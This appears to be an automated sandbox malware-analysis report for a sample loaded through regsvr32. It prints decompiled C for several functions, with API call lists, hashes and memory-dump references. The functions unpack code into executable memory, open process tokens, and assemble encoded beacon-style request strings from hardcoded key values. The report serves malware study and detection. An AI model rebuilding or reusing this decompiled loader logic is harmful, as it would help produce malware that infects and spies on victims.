Instruction ID: ca39b60297ba5c11891e025c26bd85bbf7835d67d4ea505f0e124714cc08f610
Opcode Fuzzy Hash: 558b1bdb435f52bf7f31eac62507c76b81dd35aa6142a850d44fb54b7fcbc520
Instruction Fuzzy Hash: 36311771A10209EFDB11DFA9DC81AAEB7F9FB89300F108129F545E3260E778EE109B14

Uniqueness

Uniqueness Score: -1.00%

Function 6D50B242, Relevance: 13.8, APIs: 9, Instructions: 318
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,000009B2,00003000,00000040,000009B2,6D50AC98), ref: 6D50B2FC
VirtualAlloc.KERNEL32(00000000,000000D7,00003000,00000040,6D50ACFB), ref: 6D50B333
VirtualAlloc.KERNEL32(00000000,00014ED4,00003000,00000040), ref: 6D50B393
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D50B3C9
VirtualProtect.KERNEL32(6D4A0000,00000000,00000004,6D50B221), ref: 6D50B4CE
VirtualProtect.KERNEL32(6D4A0000,00001000,00000004,6D50B221), ref: 6D50B4F5
VirtualProtect.KERNEL32(00000000,?,00000002,6D50B221), ref: 6D50B5C2
VirtualProtect.KERNEL32(00000000,?,00000002,6D50B221,?), ref: 6D50B618
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D50B634

Memory Dump Source

Source File: 00000002.00000002.1098422554.000000006D50A000.00000040.00020000.sdmp, Offset: 6D50A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d50a000_regsvr32.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 94db6ec75e7b3355c8b79fe8e1073f7e0b9c5fcc91065ff0fda1bf8dbaf2fb05
Instruction ID: bdba57c5292f3e119830b62cd7a1019b3e19645a0c61d74e42252049a46fec1f
Opcode Fuzzy Hash: 94db6ec75e7b3355c8b79fe8e1073f7e0b9c5fcc91065ff0fda1bf8dbaf2fb05
Instruction Fuzzy Hash: 2BD148725002019FDB25EF58C8C0E6277B6FFAD314B1A4994EE2DAF75AD630A9118F60

Uniqueness

Uniqueness Score: -1.00%

Function 007A3CA1, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E007A3CA1(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E007A5C4E(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E007A2A03(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x007a3cae
0x007a3caf
0x007a3cb0
0x007a3cb1
0x007a3cb2
0x007a3cb6
0x007a3cbd
0x007a3ccc
0x007a3ccf
0x007a3cd2
0x007a3cd9
0x007a3cdc
0x007a3cdf
0x007a3ce2
0x007a3ce5
0x007a3cf0
0x007a3cf2
0x007a3cfb
0x007a3d03
0x007a3d05
0x007a3d17
0x007a3d21
0x007a3d25
0x007a3d34
0x007a3d38
0x007a3d41
0x007a3d49
0x007a3d49
0x007a3d4b
0x007a3d4b
0x007a3d53
0x007a3d59
0x007a3d5d
0x007a3d5d
0x007a3d68

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 007A3CE8
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 007A3CFB
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 007A3D17

Part of subcall function 007A5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,007A3FAA), ref: 007A5C5A

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 007A3D34
memcpy.NTDLL(00000000,00000000,0000001C), ref: 007A3D41
NtClose.NTDLL(00000000), ref: 007A3D53
NtClose.NTDLL(00000000), ref: 007A3D5D

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: cc62d9420458668b52ff7e4344106ff73446239bd59f74c6acfa6b1c44bc2c68
Instruction ID: ef022daa04c5ac62245ea6f319f0e2bcdc84a7760e1896bf98cf354c02a03923
Opcode Fuzzy Hash: cc62d9420458668b52ff7e4344106ff73446239bd59f74c6acfa6b1c44bc2c68
Instruction Fuzzy Hash: 962105B2A0021DFBDB019FA5CC499DEBFBDEB89740F108122FA01E6120D7758B559BA0

Uniqueness

Uniqueness Score: -1.00%

Function 007A6124, Relevance: 34.7, APIs: 23, Instructions: 220
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E007A6124(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t58;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				void* _t69;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x7aa290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x7aa018; // 0xc6eda96f
					asm("bswap eax");
					_t32 =  *0x7aa014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0x7aa010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0x7aa00c; // 0x67522d90
					asm("bswap eax");
					_t35 =  *0x7aa2d0; // 0x4aed5a8
					_t2 = _t35 + 0x7ab622; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d14c, _t34, _t33, _t32, _t31,  *0x7aa02c,  *0x7aa004, _t110);
					_t38 = E007A271A();
					_t39 =  *0x7aa2d0; // 0x4aed5a8
					_t3 = _t39 + 0x7ab662; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0x7aa2d0; // 0x4aed5a8
						_t7 = _t92 + 0x7ab66d; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E007A2956(_t99);
					_t44 =  *0x7aa2d0; // 0x4aed5a8
					_t9 = _t44 + 0x7ab38a; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x7aa2d0; // 0x4aed5a8
					_t11 = _t48 + 0x7ab33b; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0x7aa328; // 0x52995b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x7aa2d0; // 0x4aed5a8
						_t13 = _t88 + 0x7ab685; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x7aa37c; // 0x5299630
					_a28 = E007A5741(0x7aa00a, _t105 + 4);
					_t55 =  *0x7aa318; // 0x52995e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x7aa2d0; // 0x4aed5a8
						_t16 = _t84 + 0x7ab8ea; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x7aa314; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x7aa2d0; // 0x4aed5a8
						_t18 = _t81 + 0x7ab8c1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t58 = RtlAllocateHeap( *0x7aa290, _t107, 0x800); // executed
						_t98 = _t58;
						if(_t98 != _t107) {
							E007A1A51(GetTickCount());
							_t62 =  *0x7aa37c; // 0x5299630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x7aa37c; // 0x5299630
							__imp__(_t66 + 0x40);
							_t68 =  *0x7aa37c; // 0x5299630
							_t69 = E007A5AE3(1, _t103, _t117,  *_t68); // executed
							_t115 = _t69;
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0x7a92cc);
								_push(_t115);
								_t108 = E007A2829();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E007A3B46(0xffffffffffffffff, _t98, _v12, _v8); // executed
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E007A2813();
									}
									HeapFree( *0x7aa290, 0, _v24);
								}
								HeapFree( *0x7aa290, 0, _t115);
								_t107 = 0;
							}
							RtlFreeHeap( *0x7aa290, _t107, _t98); // executed
						}
						HeapFree( *0x7aa290, _t107, _a20);
					}
					HeapFree( *0x7aa290, _t107, _t117);
				}
				return _v16;
			}

0x007a6124
0x007a6138
0x007a613a
0x007a6148
0x007a614c
0x007a6154
0x007a615c
0x007a615c
0x007a615e
0x007a616a
0x007a6179
0x007a617e
0x007a6181
0x007a6186
0x007a6189
0x007a618e
0x007a6191
0x007a619d
0x007a61aa
0x007a61ac
0x007a61b2
0x007a61b7
0x007a61c2
0x007a61c4
0x007a61c7
0x007a61cd
0x007a61cf
0x007a61d8
0x007a61e3
0x007a61e5
0x007a61e8
0x007a61e8
0x007a61ea
0x007a61f1
0x007a61f6
0x007a6203
0x007a6205
0x007a620a
0x007a6218
0x007a621a
0x007a621f
0x007a6224
0x007a6227
0x007a622c
0x007a6237
0x007a6239
0x007a623c
0x007a623c
0x007a623e
0x007a6251
0x007a6255
0x007a625a
0x007a625e
0x007a6261
0x007a6266
0x007a6271
0x007a6273
0x007a6276
0x007a6276
0x007a6278
0x007a627f
0x007a6282
0x007a6287
0x007a6291
0x007a6293
0x007a629a
0x007a62ac
0x007a62b2
0x007a62b6
0x007a62c2
0x007a62c7
0x007a62d0
0x007a62e1
0x007a62e5
0x007a62ee
0x007a62f4
0x007a62fc
0x007a6301
0x007a630e
0x007a6314
0x007a631c
0x007a6322
0x007a6328
0x007a632c
0x007a6330
0x007a6336
0x007a633a
0x007a6341
0x007a6348
0x007a634c
0x007a6357
0x007a635e
0x007a6362
0x007a636b
0x007a636b
0x007a637c
0x007a637c
0x007a638b
0x007a6391
0x007a6391
0x007a639b
0x007a639b
0x007a63ac
0x007a63ac
0x007a63ba
0x007a63ba
0x007a63ca

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 007A6142
GetTickCount.KERNEL32 ref: 007A6156
wsprintfA.USER32 ref: 007A61A5
wsprintfA.USER32 ref: 007A61C2
wsprintfA.USER32 ref: 007A61E3
wsprintfA.USER32 ref: 007A6201
wsprintfA.USER32 ref: 007A6216
wsprintfA.USER32 ref: 007A6237
wsprintfA.USER32 ref: 007A6271
wsprintfA.USER32 ref: 007A6291
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 007A62AC
GetTickCount.KERNEL32 ref: 007A62BC
RtlEnterCriticalSection.NTDLL(052995F0), ref: 007A62D0
RtlLeaveCriticalSection.NTDLL(052995F0), ref: 007A62EE

Part of subcall function 007A5AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,007A6301,00000000,05299630), ref: 007A5B0E
Part of subcall function 007A5AE3: lstrlen.KERNEL32(00000000,?,00000000,007A6301,00000000,05299630), ref: 007A5B16
Part of subcall function 007A5AE3: strcpy.NTDLL ref: 007A5B2D
Part of subcall function 007A5AE3: lstrcat.KERNEL32(00000000,00000000), ref: 007A5B38
Part of subcall function 007A5AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,007A6301,?,00000000,007A6301,00000000,05299630), ref: 007A5B55

StrTrimA.SHLWAPI(00000000,007A92CC,00000000,05299630), ref: 007A631C

Part of subcall function 007A2829: lstrlen.KERNEL32(0529887A,00000000,00000000,00000000,007A6328,00000000), ref: 007A2839
Part of subcall function 007A2829: lstrlen.KERNEL32(?), ref: 007A2841
Part of subcall function 007A2829: lstrcpy.KERNEL32(00000000,0529887A), ref: 007A2855
Part of subcall function 007A2829: lstrcat.KERNEL32(00000000,?), ref: 007A2860

lstrcpy.KERNEL32(00000000,?), ref: 007A633A
lstrcat.KERNEL32(00000000,00000000), ref: 007A6348
lstrcat.KERNEL32(00000000,00000000), ref: 007A634C
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 007A637C
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 007A638B
RtlFreeHeap.NTDLL(00000000,00000000,00000000,05299630), ref: 007A639B
HeapFree.KERNEL32(00000000,?), ref: 007A63AC
HeapFree.KERNEL32(00000000,00000000), ref: 007A63BA

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID:
API String ID: 1837416118-0
Opcode ID: d7d7bc4e450200fd6921a8546e32dcc2435c2f8490a32022a8dbd02ee56273ae
Instruction ID: 679fa648111aaf026c90e14e36aedf574fbd3de0c376e66edfec82555fbad536
Opcode Fuzzy Hash: d7d7bc4e450200fd6921a8546e32dcc2435c2f8490a32022a8dbd02ee56273ae
Instruction Fuzzy Hash: AF718E72500205FFCB51DB68EC48E977BE8FBCA310B058615F949C3261E73EA815CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 007A6DB7, Relevance: 33.3, APIs: 22, Instructions: 263
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E007A6DB7(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t102;
				void* _t107;
				intOrPtr _t112;
				signed int _t116;
				char** _t118;
				int _t121;
				signed int _t123;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr _t133;
				intOrPtr _t136;
				int _t139;
				intOrPtr _t140;
				int _t143;
				void* _t144;
				void* _t145;
				void* _t155;
				int _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				intOrPtr _t162;
				void* _t164;
				long _t168;
				intOrPtr* _t169;
				intOrPtr* _t172;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t181;

				_t155 = __edx;
				_t145 = __ecx;
				_t63 = __eax;
				_t144 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x7aa018; // 0xc6eda96f
				asm("bswap eax");
				_t65 =  *0x7aa014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0x7aa010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0x7aa00c; // 0x67522d90
				asm("bswap eax");
				_t68 =  *0x7aa2d0; // 0x4aed5a8
				_t3 = _t68 + 0x7ab622; // 0x74666f73
				_t158 = wsprintfA(_t144, _t3, 3, 0x3d14c, _t67, _t66, _t65, _t64,  *0x7aa02c,  *0x7aa004, _t63);
				_t71 = E007A271A();
				_t72 =  *0x7aa2d0; // 0x4aed5a8
				_t4 = _t72 + 0x7ab662; // 0x74707526
				_t75 = wsprintfA(_t158 + _t144, _t4, _t71);
				_t175 = _t173 + 0x38;
				_t159 = _t158 + _t75;
				if(_a8 != 0) {
					_t140 =  *0x7aa2d0; // 0x4aed5a8
					_t8 = _t140 + 0x7ab66d; // 0x732526
					_t143 = wsprintfA(_t159 + _t144, _t8, _a8);
					_t175 = _t175 + 0xc;
					_t159 = _t159 + _t143;
				}
				_t76 = E007A2956(_t145);
				_t77 =  *0x7aa2d0; // 0x4aed5a8
				_t10 = _t77 + 0x7ab38a; // 0x6d697426
				_t160 = _t159 + wsprintfA(_t159 + _t144, _t10, _t76, _t155);
				_t81 =  *0x7aa2d0; // 0x4aed5a8
				_t12 = _t81 + 0x7ab7b4; // 0x5298d5c
				_t181 = _a4 - _t12;
				_t14 = _t81 + 0x7ab33b; // 0x74636126
				_t157 = 0 | _t181 == 0x00000000;
				_t161 = _t160 + wsprintfA(_t160 + _t144, _t14, _t181 == 0);
				_t85 =  *0x7aa318; // 0x52995e0
				_t176 = _t175 + 0x1c;
				if(_t85 != 0) {
					_t136 =  *0x7aa2d0; // 0x4aed5a8
					_t18 = _t136 + 0x7ab8ea; // 0x3d736f26
					_t139 = wsprintfA(_t161 + _t144, _t18, _t85);
					_t176 = _t176 + 0xc;
					_t161 = _t161 + _t139;
				}
				_t86 =  *0x7aa328; // 0x52995b0
				if(_t86 != 0) {
					_t133 =  *0x7aa2d0; // 0x4aed5a8
					_t20 = _t133 + 0x7ab685; // 0x73797326
					wsprintfA(_t161 + _t144, _t20, _t86);
					_t176 = _t176 + 0xc;
				}
				_t162 =  *0x7aa37c; // 0x5299630
				_t88 = E007A5741(0x7aa00a, _t162 + 4);
				_t168 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					RtlFreeHeap( *0x7aa290, _t168, _t144); // executed
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0x7aa290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0x7aa290, _t168, _v12);
						goto L28;
					}
					E007A1A51(GetTickCount());
					_t95 =  *0x7aa37c; // 0x5299630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0x7aa37c; // 0x5299630
					__imp__(_t99 + 0x40);
					_t101 =  *0x7aa37c; // 0x5299630
					_t102 = E007A5AE3(1, _t157, _t144,  *_t101); // executed
					_t164 = _t102;
					_v20 = _t164;
					asm("lock xadd [eax], ecx");
					if(_t164 == 0) {
						L26:
						HeapFree( *0x7aa290, _t168, _a8);
						goto L27;
					}
					StrTrimA(_t164, 0x7a92cc);
					_push(_t164);
					_t107 = E007A2829();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0x7aa290, _t168, _t164);
						goto L26;
					}
					 *_t164 = 0;
					__imp__(_a8, _v12);
					_t169 = __imp__;
					 *_t169(_a8, _v8);
					 *_t169(_a8, _t164);
					_t112 = E007A33FA(0, _a8);
					_a4 = _t112;
					if(_t112 == 0) {
						_a20 = 8;
						L23:
						E007A2813();
						L24:
						HeapFree( *0x7aa290, 0, _v8);
						_t168 = 0;
						goto L25;
					}
					_t116 = E007A5C63(_t144, 0xffffffffffffffff, _t164,  &_v16); // executed
					_a20 = _t116;
					if(_t116 == 0) {
						_t172 = _v16;
						_t123 = E007A1671(_t172, _a4, _a12, _a16); // executed
						_a20 = _t123;
						_t124 =  *((intOrPtr*)(_t172 + 8));
						 *((intOrPtr*)( *_t124 + 0x80))(_t124);
						_t126 =  *((intOrPtr*)(_t172 + 8));
						 *((intOrPtr*)( *_t126 + 8))(_t126);
						_t128 =  *((intOrPtr*)(_t172 + 4));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						_t130 =  *_t172;
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						E007A2A03(_t172);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t118 = _a12;
							if(_t118 != 0) {
								_t165 =  *_t118;
								_t170 =  *_a16;
								wcstombs( *_t118,  *_t118,  *_a16);
								_t121 = E007A6459(_t165, _t165, _t170 >> 1);
								_t164 = _v20;
								 *_a16 = _t121;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E007A2A03(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x007a6db7
0x007a6db7
0x007a6db7
0x007a6dc0
0x007a6dc5
0x007a6dcc
0x007a6dce
0x007a6dce
0x007a6ddb
0x007a6de6
0x007a6de9
0x007a6df4
0x007a6df7
0x007a6dfc
0x007a6dff
0x007a6e04
0x007a6e07
0x007a6e13
0x007a6e20
0x007a6e22
0x007a6e28
0x007a6e2d
0x007a6e38
0x007a6e3a
0x007a6e3d
0x007a6e43
0x007a6e45
0x007a6e4d
0x007a6e58
0x007a6e5a
0x007a6e5d
0x007a6e5d
0x007a6e5f
0x007a6e66
0x007a6e6b
0x007a6e78
0x007a6e7a
0x007a6e7f
0x007a6e87
0x007a6e8a
0x007a6e90
0x007a6e9b
0x007a6e9d
0x007a6ea2
0x007a6ea7
0x007a6eaa
0x007a6eaf
0x007a6eba
0x007a6ebc
0x007a6ebf
0x007a6ebf
0x007a6ec1
0x007a6ec8
0x007a6ecb
0x007a6ed0
0x007a6eda
0x007a6edc
0x007a6edc
0x007a6edf
0x007a6eed
0x007a6ef2
0x007a6ef6
0x007a6ef9
0x007a70c5
0x007a70cd
0x007a70da
0x007a6eff
0x007a6f0b
0x007a6f13
0x007a6f16
0x007a70b5
0x007a70bf
0x00000000
0x007a70bf
0x007a6f22
0x007a6f27
0x007a6f30
0x007a6f41
0x007a6f45
0x007a6f4e
0x007a6f54
0x007a6f5c
0x007a6f61
0x007a6f68
0x007a6f71
0x007a6f77
0x007a70a5
0x007a70af
0x00000000
0x007a70af
0x007a6f83
0x007a6f89
0x007a6f8a
0x007a6f91
0x007a6f94
0x007a7097
0x007a709f
0x00000000
0x007a709f
0x007a6f9d
0x007a6fa3
0x007a6fac
0x007a6fb5
0x007a6fbb
0x007a6fc2
0x007a6fc9
0x007a6fcc
0x007a70dd
0x007a707f
0x007a707f
0x007a7084
0x007a708f
0x007a7095
0x00000000
0x007a7095
0x007a6fd6
0x007a6fdd
0x007a6fe0
0x007a6fe5
0x007a6ff0
0x007a6ff5
0x007a6ff8
0x007a6ffe
0x007a7004
0x007a700a
0x007a700d
0x007a7013
0x007a7016
0x007a701b
0x007a701f
0x007a701f
0x007a702b
0x007a7037
0x007a703b
0x007a703d
0x007a7042
0x007a7044
0x007a7049
0x007a704e
0x007a705b
0x007a7063
0x007a7066
0x007a7066
0x007a7042
0x00000000
0x007a702d
0x007a7031
0x007a7068
0x007a706b
0x007a7074
0x00000000
0x00000000
0x00000000
0x00000000
0x007a7074
0x007a7033
0x00000000
0x007a7033
0x007a702b

APIs

GetTickCount.KERNEL32 ref: 007A6DCE
wsprintfA.USER32 ref: 007A6E1B
wsprintfA.USER32 ref: 007A6E38
wsprintfA.USER32 ref: 007A6E58
wsprintfA.USER32 ref: 007A6E76
wsprintfA.USER32 ref: 007A6E99
wsprintfA.USER32 ref: 007A6EBA
wsprintfA.USER32 ref: 007A6EDA
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 007A6F0B
GetTickCount.KERNEL32 ref: 007A6F1C
RtlEnterCriticalSection.NTDLL(052995F0), ref: 007A6F30
RtlLeaveCriticalSection.NTDLL(052995F0), ref: 007A6F4E

Part of subcall function 007A5AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,007A6301,00000000,05299630), ref: 007A5B0E
Part of subcall function 007A5AE3: lstrlen.KERNEL32(00000000,?,00000000,007A6301,00000000,05299630), ref: 007A5B16
Part of subcall function 007A5AE3: strcpy.NTDLL ref: 007A5B2D
Part of subcall function 007A5AE3: lstrcat.KERNEL32(00000000,00000000), ref: 007A5B38
Part of subcall function 007A5AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,007A6301,?,00000000,007A6301,00000000,05299630), ref: 007A5B55

StrTrimA.SHLWAPI(00000000,007A92CC,?,05299630), ref: 007A6F83

Part of subcall function 007A2829: lstrlen.KERNEL32(0529887A,00000000,00000000,00000000,007A6328,00000000), ref: 007A2839
Part of subcall function 007A2829: lstrlen.KERNEL32(?), ref: 007A2841
Part of subcall function 007A2829: lstrcpy.KERNEL32(00000000,0529887A), ref: 007A2855
Part of subcall function 007A2829: lstrcat.KERNEL32(00000000,?), ref: 007A2860

lstrcpy.KERNEL32(00000000,?), ref: 007A6FA3
lstrcat.KERNEL32(00000000,?), ref: 007A6FB5
lstrcat.KERNEL32(00000000,00000000), ref: 007A6FBB

Part of subcall function 007A33FA: lstrlen.KERNEL32(?,007AA380,73BB7FC0,00000000,007A2788,?,?,?,?,?,007A3EAC,?), ref: 007A3403
Part of subcall function 007A33FA: mbstowcs.NTDLL ref: 007A342A
Part of subcall function 007A33FA: memset.NTDLL ref: 007A343C

wcstombs.NTDLL ref: 007A704E

Part of subcall function 007A1671: SysAllocString.OLEAUT32(00000000), ref: 007A16B2
Part of subcall function 007A1671: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 007A1734
Part of subcall function 007A1671: StrStrIW.SHLWAPI(00000000,006E0069), ref: 007A1773

Part of subcall function 007A2A03: RtlFreeHeap.NTDLL(00000000,00000000,007A4072,00000000,?,?,00000000,?,?,?,?,?,?,007A44AE,00000000), ref: 007A2A0F

HeapFree.KERNEL32(00000000,?,00000000), ref: 007A708F
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 007A709F
HeapFree.KERNEL32(00000000,00000000,?,05299630), ref: 007A70AF
HeapFree.KERNEL32(00000000,?), ref: 007A70BF
RtlFreeHeap.NTDLL(00000000,?), ref: 007A70CD

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 2871901346-0
Opcode ID: 25eedbe682173f9b93164075ce544056926cd7983f2c710b953fef5c0e325cfe
Instruction ID: 3e98ba7fab7904b60ed325935aa24982f9bac487419b67d668af902ec7c6d70f
Opcode Fuzzy Hash: 25eedbe682173f9b93164075ce544056926cd7983f2c710b953fef5c0e325cfe
Instruction Fuzzy Hash: 7AA15671500119EFCB11DFA8DC88EAB3BA8FBCA350F158125F909C7261DB399961CBA5

Uniqueness

